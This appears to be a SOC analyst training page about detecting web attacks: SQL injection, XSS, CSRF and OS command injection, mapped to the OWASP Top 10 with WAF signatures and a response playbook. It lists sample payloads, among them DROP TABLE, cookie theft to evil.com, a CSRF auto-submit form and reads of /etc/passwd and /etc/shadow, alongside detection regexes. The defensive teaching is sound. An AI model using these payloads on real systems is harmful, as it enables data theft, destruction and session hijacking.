Web Application Attacks

XSS, SQLi, CSRF & More - Detection from the SOC Perspective

WRAP Module - Extends Web Security Training

Web Attacks: SOC Detection Focus

The Shield House web security modules teach attack mechanics. This module focuses on how to detect these attacks in logs, WAF alerts, and SIEM as a SOC analyst.

Prerequisite Training - Shield House

Master attack fundamentals before learning detection patterns.

SQL Injection Cross-Site Scripting Command Injection Code Injection

OWASP Top 10 (2021) Overview

A01

Broken Access Control

Users acting outside intended permissions. IDOR, privilege escalation, path traversal.

A02

Cryptographic Failures

Weak encryption, plaintext data exposure, deprecated algorithms.

A03

Injection

SQL, NoSQL, OS command, LDAP injection attacks through untrusted data.

A04

Insecure Design

Missing or ineffective security controls in application design.

A05

Security Misconfiguration

Default configs, open cloud storage, verbose errors, missing patches.

A06

Vulnerable Components

Using libraries with known vulnerabilities (Log4j, Struts, etc.)

A07

Auth Failures

Broken authentication, weak credentials, session hijacking.

A08

Integrity Failures

Insecure deserialization, CI/CD pipeline compromises.

A09

Logging Failures

Insufficient logging, missing alerts, no incident response.

A10

SSRF

Server-Side Request Forgery - forcing server to make requests.

SQL Injection (SQLi)

T1190

Attacker inserts malicious SQL commands into input fields to manipulate database queries.

Common Payloads:
' OR '1'='1 -- Always true condition
'; DROP TABLE users;-- -- Destructive query
' UNION SELECT username,password FROM users-- -- Data extraction
admin'-- -- Comment out password check

SOC Detection

  • Look for SQL keywords in URLs/POST data
  • Monitor for database errors in responses
  • Alert on UNION, SELECT, DROP in input
  • Watch for encoded variants (%27 = ')

WAF Signatures

  • OR.*=.* (Boolean injection)
  • UNION.*SELECT
  • -- or # (Comment chars)
  • '; .*-- (Chained queries)
Apache Access Log - SQLi Attempt
192.168.1.100 - - [04/Jan/2024:14:23:45 +0000] "GET /products?id=1' OR '1'='1 HTTP/1.1" 200 5432 "-" "Mozilla/5.0"

Cross-Site Scripting (XSS)

T1059.007

Attacker injects malicious scripts that execute in victims' browsers to steal session data or perform actions.

Common Payloads:
<script>alert('XSS')</script> -- Basic test
<img src=x onerror=alert(1)> -- Event handler
<svg onload=alert(1)> -- SVG vector
javascript:alert(document.cookie) -- Cookie theft

SOC Detection

  • HTML tags in URL parameters
  • Event handlers (onerror, onload, onclick)
  • JavaScript protocol in links
  • Encoded script tags (%3Cscript%3E)

WAF Signatures

  • <script.*>
  • on\w+= (Event handlers)
  • javascript:
  • <.*on\w+=.*>
Web Application Log - Stored XSS
[WARN] Comment submitted with suspicious content: "<script>document.location='http://evil.com/?c='+document.cookie</script>"

Cross-Site Request Forgery (CSRF)

T1185

Tricks authenticated users into performing unwanted actions on sites where they're logged in.

Attack Example:
<img src="https://bank.com/transfer?to=attacker&amount=10000">
<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="to" value="attacker">
  <input type="hidden" name="amount" value="10000">
</form><script>document.forms[0].submit()</script>

SOC Detection

  • Requests missing CSRF tokens
  • Referer header from external domain
  • State-changing GET requests
  • Unusual request patterns from users

Prevention

  • Anti-CSRF tokens (per-session/per-request)
  • SameSite cookie attribute
  • Referer header validation
  • Re-authentication for sensitive actions

OS Command Injection

T1059

Attacker executes arbitrary system commands through vulnerable web applications.

Common Payloads:
; cat /etc/passwd -- Linux password file
| whoami -- Current user
& dir C:\ -- Windows directory
`id` -- Backtick execution
$(cat /etc/shadow) -- Command substitution

SOC Detection

  • Shell metacharacters (; | & ` $)
  • System commands in input (cat, ls, whoami)
  • Process execution anomalies
  • Outbound connections from web server

WAF Signatures

  • [;&|`$] (Shell metacharacters)
  • /etc/passwd
  • cmd\.exe|powershell
  • \$\(.*\) (Command substitution)

Web Attack Log Analyzer

Paste a log entry or URL to identify potential web attack patterns.

Attack Pattern Detector

SOC Response Playbook

Attack Type Immediate Actions Long-term Remediation
SQL Injection Block IP, check for data exfil, audit DB Parameterized queries, input validation, WAF rules
XSS Remove malicious content, notify affected users Output encoding, CSP headers, sanitize input
CSRF Invalidate sessions, review transaction logs CSRF tokens, SameSite cookies, Referer check
Command Injection Isolate server, forensic imaging, check persistence Remove shell access, input whitelist, sandboxing

Web Application Attacks Assessment

Test your ability to identify and respond to web application attacks.

Assessment Complete!

0/5